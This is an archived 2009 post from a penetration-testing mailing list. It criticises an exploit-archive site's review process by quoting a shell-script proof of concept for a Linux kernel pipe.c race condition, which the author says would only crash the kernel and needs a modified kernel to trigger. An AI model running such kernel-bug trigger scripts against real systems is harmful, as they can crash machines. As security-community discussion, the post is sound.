Penetration Testing mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Possible Milw0rm replacement?

From: Siim Põder <siim () p6drad-teel net>
Date: Tue, 17 Nov 2009 15:04:41 +0200
Hi

Tom Green wrote:

http://exploits.offensive-security.com/


Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":
while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Not only would that just OOPS the kernel and kill the process, it also
needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The
discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site ;)

Siim

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: